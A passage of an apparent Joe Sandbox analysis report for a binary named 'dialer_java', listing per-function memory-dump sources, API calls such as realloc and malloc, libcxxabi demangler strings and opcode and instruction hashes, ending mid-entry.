                                      • Instruction Fuzzy Hash: 7E91E3B3B06B8282EB258F1AE4453A977A4FB54B84F048135CF9D57795EF3DE4928304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: 820f43f822463fb6ccee1dd20fe9ec16f7cf86f838d61afeeac975018113ba4f
                                      • Instruction ID: 4aa5f039bd664470e192ba3fe29a9e26590df6c9f8d7d626dd209411a4b3bd9f
                                      • Opcode Fuzzy Hash: 820f43f822463fb6ccee1dd20fe9ec16f7cf86f838d61afeeac975018113ba4f
                                      • Instruction Fuzzy Hash: D89172B3A05B8283EA249F59F0553ADB761EB58BC4F408531CB8E577A4EF3DE0818305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fputwc
                                      • String ID:
                                      • API String ID: 761389786-0
                                      • Opcode ID: 5170ea0f942b3d93673314322599268af59ede64674dcde32236e23149b41f4c
                                      • Instruction ID: 4736851dfbed467e33ac04a28c14ecacf4d5c02325731c5bf687ecedd3ece80d
                                      • Opcode Fuzzy Hash: 5170ea0f942b3d93673314322599268af59ede64674dcde32236e23149b41f4c
                                      • Instruction Fuzzy Hash: F1E15373B3824287E7788A1EE15673A7BD1EB54B40F005139DB9BD6691DE2FE880C709
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$memcpyrealloc
                                      • String ID: auto
                                      • API String ID: 2642181057-1723475450
                                      • Opcode ID: d68e97057976446f2cce18955a4260cb645a2ea6946946f02118f0da23deb918
                                      • Instruction ID: 330ba64c93ea8768494a5ed5a25ef03c0c8bba49a7106efedfb329d5420e9665
                                      • Opcode Fuzzy Hash: d68e97057976446f2cce18955a4260cb645a2ea6946946f02118f0da23deb918
                                      • Instruction Fuzzy Hash: F6A1FF6371AA8281EB248B2CE4493A97B95EF04B94F444236CBAD973D1EF7DE0958305
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: 91fbf0612a32bf460f63d29e70cfa5a713f3c52a70bc57ccc4705e96ca3739cc
                                      • Instruction ID: c55ada0590260f7c07f10017a6ce59509778d252e6eefa4004c3a4875cd5baee
                                      • Opcode Fuzzy Hash: 91fbf0612a32bf460f63d29e70cfa5a713f3c52a70bc57ccc4705e96ca3739cc
                                      • Instruction Fuzzy Hash: 4871E663F081C246F7798A1EE14A77D6ED1EB14754F045130CE6EA6AC2DE3EE8C18706
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$malloc
                                      • String ID: imaginary$noexcept
                                      • API String ID: 454241450-3971218317
                                      • Opcode ID: 87dcfbe6bad413ec65d64ef39e25c3b70162464389fa30d34c7d9aefbdbe6664
                                      • Instruction ID: 5991dd6899524effe99664c2f33d8b0676b641b5a94ae95e99524a6e6f95a6a8
                                      • Opcode Fuzzy Hash: 87dcfbe6bad413ec65d64ef39e25c3b70162464389fa30d34c7d9aefbdbe6664
                                      • Instruction Fuzzy Hash: 9251B1B3B05B8282EB288F19E4847AD77A0EB54B84F048535DB8D577A5EF3DD592C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _assert$fflush
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp$actions & _UA_CLEANUP_PHASE$results.reason == _URC_HANDLER_FOUND
                                      • API String ID: 289967094-1554099779
                                      • Opcode ID: 53fe620101f0f1196f6f36d0f1a8cbc34963f56b63f02f4e93a45d900a4484cd
                                      • Instruction ID: b9a6adf03be880b4499c38879f6d8ae63f5c9a84dd5e46bf30760477b1e6cc33
                                      • Opcode Fuzzy Hash: 53fe620101f0f1196f6f36d0f1a8cbc34963f56b63f02f4e93a45d900a4484cd
                                      • Instruction Fuzzy Hash: 9A41D022F2C68241EE718B4EF1423B97E91AB95790F041139DE0DE7B84DE2EE5C1834A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: tInt$unsigned
                                      • API String ID: 471065373-1789806510
                                      • Opcode ID: ef3acf26705adc4dc0c40c1580519def5e7105bcddab961c785bcf0feaa8951c
                                      • Instruction ID: 36bf3f96530e79a9c50009bc15ccfd2228f19ea971f2693f10750e51f17734d0
                                      • Opcode Fuzzy Hash: ef3acf26705adc4dc0c40c1580519def5e7105bcddab961c785bcf0feaa8951c
                                      • Instruction Fuzzy Hash: D0418FB3A06B8282DA258F4AF45476DB7A1EBA4BC0F04C531CB8E57794EF3DE4818341
                                      APIs
                                      Strings
                                      • starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: mallocmemcpystrlen
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
                                      • API String ID: 3344349799-3503049562
                                      • Opcode ID: 411cc94d638b4c5a65666b04f682356d8a7e8c8d03e2840adf31fc5fabca7cb3
                                      • Instruction ID: 1a7685b355084759f80998128cbb57e36b134bbff34fc4aa5dbaf8b5ed7fcaab
                                      • Opcode Fuzzy Hash: 411cc94d638b4c5a65666b04f682356d8a7e8c8d03e2840adf31fc5fabca7cb3
                                      • Instruction Fuzzy Hash: 86419023719B4682EA60DB1DA44637E6BA4EB407C0F440035DB8EA7BA5EF3DE185C346
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$_assert
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/Utility.h$CurrentPosition
                                      • API String ID: 940201557-3339543485
                                      • Opcode ID: 7acef73fbec41d6dfa1be67c13337ccc807f794cd771a4b3e4e2917c685efc0b
                                      • Instruction ID: d4e78ed92cc4dc856d728eac3bca37cdb2df58ac08df4858778e45f2d33ceb4a
                                      • Opcode Fuzzy Hash: 7acef73fbec41d6dfa1be67c13337ccc807f794cd771a4b3e4e2917c685efc0b
                                      • Instruction Fuzzy Hash: AF4190B7B05F8282EF29CF5AE4853796B61EB58B80F048532CB8E57794DF2DE5818205
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: memsetwcscatwcscpywcslen
                                      • String ID: $0$@
                                      • API String ID: 468205783-2347541974
                                      • Opcode ID: e183844e820dd185498d54a444cfdf65eda0e2a936280ba6ff7fda81fa3f1c34
                                      • Instruction ID: 7d20ae6084ba75f44562bb0b2d86bf0645bd280eb7ee92d11a6faa314cb2a448
                                      • Opcode Fuzzy Hash: e183844e820dd185498d54a444cfdf65eda0e2a936280ba6ff7fda81fa3f1c34
                                      • Instruction Fuzzy Hash: DF418163A2C7C281F300DB19E40A379BBA0EBA5744F000136E6CDA2665DF7ED185CB0A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _assertmemcpyrealloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basic_string$starts_with(SV, "basic_")
                                      • API String ID: 2326172077-800580732
                                      • Opcode ID: 1cf50003512e3ea4dae628e96ebf30add7ca9d163f89edfb160867659c8d9a78
                                      • Instruction ID: 91924d82b90586ecce52c0b498c9a7d97d85c4bf6b503b26b8cf01adae87d17a
                                      • Opcode Fuzzy Hash: 1cf50003512e3ea4dae628e96ebf30add7ca9d163f89edfb160867659c8d9a78
                                      • Instruction Fuzzy Hash: 4601ADA3F05B8282EA189B0DF4863B96B61EF547C4F408431CA4DA7795EE2EE1C18306
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$reallocstrlen
                                      • String ID:
                                      • API String ID: 2374275640-0
                                      • Opcode ID: 9fcff9b977f65c3a391a145938d85213577a97e659ce38ebb67324265da1d897
                                      • Instruction ID: 6eecc63723c8389a21216b084c93a73cbba264d8544dad0f98453af1edd1f8de
                                      • Opcode Fuzzy Hash: 9fcff9b977f65c3a391a145938d85213577a97e659ce38ebb67324265da1d897
                                      • Instruction Fuzzy Hash: 1FC11563709BC181EB158F28D0953AD7BA5EB44B81F088231DB9D973DAEF2DE592C305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: 30d2cb59483826d978f11d2be31c172a2ece989509a146521bc4926f218ec95d
                                      • Instruction ID: 7cbbfa903142f6cb9850daaba303b122f285cd719e09d48c4efdf0a57b92e0d1
                                      • Opcode Fuzzy Hash: 30d2cb59483826d978f11d2be31c172a2ece989509a146521bc4926f218ec95d
                                      • Instruction Fuzzy Hash: 145191B3B05B8682DF248F4AE485379A765EB54BC4F048532CB8E57794DF3DE0828301
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: d16cc2fde265a49c118596b96dd5b5cfa61d07f1c591749a92ff39ed06f51163
                                      • Instruction ID: 748e61f69fe09d27e410122c37dc6c8f81da15d25cc502e1df728e21743275e2
                                      • Opcode Fuzzy Hash: d16cc2fde265a49c118596b96dd5b5cfa61d07f1c591749a92ff39ed06f51163
                                      • Instruction Fuzzy Hash: C4517FB3B06B8283DA249F5AE494369B7A5FB58BC0F448535CB8E57795EF3DE0818304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: 6905e7ca18b6a58da2f216068c29ad50521c822ba058662085adb930a16d6f30
                                      • Instruction ID: 2df0e1fdb261e9cc4d6fa6fffe6a39bb8769154600b7dea3044deb160a390f9f
                                      • Opcode Fuzzy Hash: 6905e7ca18b6a58da2f216068c29ad50521c822ba058662085adb930a16d6f30
                                      • Instruction Fuzzy Hash: CE5190B3B05B8683DE288F0AE49436DA761EB59BC4F048531CB8E577A5EF3DE0918304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                      • String ID:
                                      • API String ID: 3326252324-0
                                      • Opcode ID: 08f0997568cc7a319e12c3eb93543c3c92b5c3fd4d446526cdcdb6b294db1472
                                      • Instruction ID: 006746aa31af3d7caff7aa88500433000a92f6b519bb34d39658a798ac3280d8
                                      • Opcode Fuzzy Hash: 08f0997568cc7a319e12c3eb93543c3c92b5c3fd4d446526cdcdb6b294db1472
                                      • Instruction Fuzzy Hash: 4F210766B19A0385E6559B09E8023347A60BF62F90F450035C84EF36A0CF2FE8C6878A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$malloc
                                      • String ID: vector[$pixel ve
                                      • API String ID: 454241450-4216275618
                                      • Opcode ID: c7e31e28da302632c023a726f4a17732f91bf8205f05fac472730efd64aa863f
                                      • Instruction ID: 8962fa05dae6e904b55a449b87362e469456aa02567825739cb96e76ec0b64f5
